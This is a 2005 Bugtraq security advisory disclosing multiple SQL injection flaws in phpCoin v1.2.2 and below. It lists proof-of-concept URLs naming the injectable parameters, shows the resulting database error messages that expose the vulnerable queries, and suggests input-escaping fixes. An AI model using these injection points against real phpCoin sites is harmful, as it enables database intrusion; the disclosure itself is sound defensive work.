[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple Sql injections in phpCoin v1.2.2 and below
From: dcrab <dcrab () hackerscenter ! com>
Date: 2005-04-28 20:28:14
Message-ID: 20050428202814.19799.qmail () www ! securityfocus ! com
[Download RAW message or body]
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at \
http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple Sql injections in phpCoin v1.2.2 and below
Date: 28/04/2005
Vendor: phpCoin
Vendor Website: http://www.phpcoin.com/
Vendor contact status: Contacted 5 days before release of advisory, but no response.
Summary: There are, multiple sql injections in phpcoin v1.2.2 and below.
Refrence: http://digitalparadox.org/viewadvisories.ah?view=36
Proof of Concept Exploits:
http://docs.localhost/index.php?title=Special%3aSearch&search=(SQL_INJECTION
SQL INJECTION
A database query syntax error has occurred. This could be because of an illegal \
search query (see Searching PhpCOIN Docs), or it may indicate a bug in the software. \
The last attempted database query was:
SELECT cur_id,cur_namespace,cur_title,cur_text FROM cur,searchindex WHERE \
cur_id=si_page AND ( ( (MATCH (si_title) AGAINST ('SQL_INJECTION')) ) AND \
cur_namespace IN (0,9,11) LIMIT 0, 20
from within function "SearchEngine::showResults". MySQL returned error "1064: You \
have an error in your SQL syntax near 'LIMIT 0, 20' at line 1".
http://localhost/login.php?w=user&o=login&phpcoinsessid=SQL_INJECTION'
SQL_INJECTION
Unable to execute query: (SELECT * FROM phpcoin_components WHERE comp_name='siteinfo' \
AND comp_mod='SQL_INJECTION\' ORDER BY comp_id ASC). Error returned is: ( : ).
Check the syntax / server connection and and try again.
http://localhost/mod.php?mod=siteinfo&id=SQL_INJECTION'&phpcoinsessid=8d4706204348394afece6b64db3d9b95
SQL INJECTION
Unable to execute query: (SELECT * FROM phpcoin_components WHERE comp_name='siteinfo' \
AND comp_mod='SQL_INJECTION\' ORDER BY comp_id ASC). Error returned is: ( : ).
Check the syntax / server connection and and try again.
http://localhost/mod.php?mod=pages&mode=list&dtopic_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b
SQL INJECTION
Database Error:
Unable to execute query: (SELECT COUNT(*) FROM phpcoin_pages, phpcoin_topics, \
phpcoin_categories WHERE phpcoin_pages.topic_id = phpcoin_topics.topic_id AND \
phpcoin_pages.cat_id = phpcoin_categories.cat_id AND phpcoin_pages.topic_id = \
SQL_INJECTION\ AND phpcoin_pages.pages_admin = 0 AND phpcoin_pages.pages_status = 1). \
Error returned is: ( : ). Check the syntax / server connection and and try again.
Database Error:
Unable to execute query: (SELECT phpcoin_pages.id, phpcoin_pages.subject, \
phpcoin_pages.topic_id, phpcoin_pages.cat_id, phpcoin_pages.time_stamp, \
phpcoin_pages.pages_title, phpcoin_pages.pages_code, phpcoin_pages.pages_block_it, \
phpcoin_pages.pages_status, phpcoin_pages.pages_admin, phpcoin_topics.topic_name, \
phpcoin_categories.cat_name FROM phpcoin_pages, phpcoin_topics, phpcoin_categories \
WHERE phpcoin_pages.topic_id = phpcoin_topics.topic_id AND phpcoin_pages.cat_id = \
phpcoin_categories.cat_id AND phpcoin_pages.topic_id = SQL_INJECTION\ AND \
phpcoin_pages.pages_admin = 0 AND phpcoin_pages.pages_status = 1 ORDER BY time_stamp \
DESC LIMIT 0, 15). Error returned is: ( : ).
Check the syntax / server connection and and try again.
http://localhost/mod.php?mod=pages&mode=list&dcat_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b
SQL INJECTION
Database Error:
Unable to execute query: (SELECT COUNT(*) FROM phpcoin_pages, phpcoin_topics, \
phpcoin_categories WHERE phpcoin_pages.topic_id = phpcoin_topics.topic_id AND \
phpcoin_pages.cat_id = phpcoin_categories.cat_id AND phpcoin_pages.cat_id = \
SQL_INJECTION\ AND phpcoin_pages.pages_admin = 0 AND phpcoin_pages.pages_status = 1). \
Error returned is: ( : ). Check the syntax / server connection and and try again.
Database Error:
Unable to execute query: (SELECT phpcoin_pages.id, phpcoin_pages.subject, \
phpcoin_pages.topic_id, phpcoin_pages.cat_id, phpcoin_pages.time_stamp, \
phpcoin_pages.pages_title, phpcoin_pages.pages_code, phpcoin_pages.pages_block_it, \
phpcoin_pages.pages_status, phpcoin_pages.pages_admin, phpcoin_topics.topic_name, \
phpcoin_categories.cat_name FROM phpcoin_pages, phpcoin_topics, phpcoin_categories \
WHERE phpcoin_pages.topic_id = phpcoin_topics.topic_id AND phpcoin_pages.cat_id = \
phpcoin_categories.cat_id AND phpcoin_pages.cat_id = SQL_INJECTION\ AND \
phpcoin_pages.pages_admin = 0 AND phpcoin_pages.pages_status = 1 ORDER BY time_stamp \
DESC LIMIT 0, 15). Error returned is: ( : ).
Check the syntax / server connection and and try again.
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), \
mysql_real_escape_string() and other functions for input validation before passing \
user input to the mysql database, or before echoing data on the screen, would solve \
these problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me \
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding \
with php.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic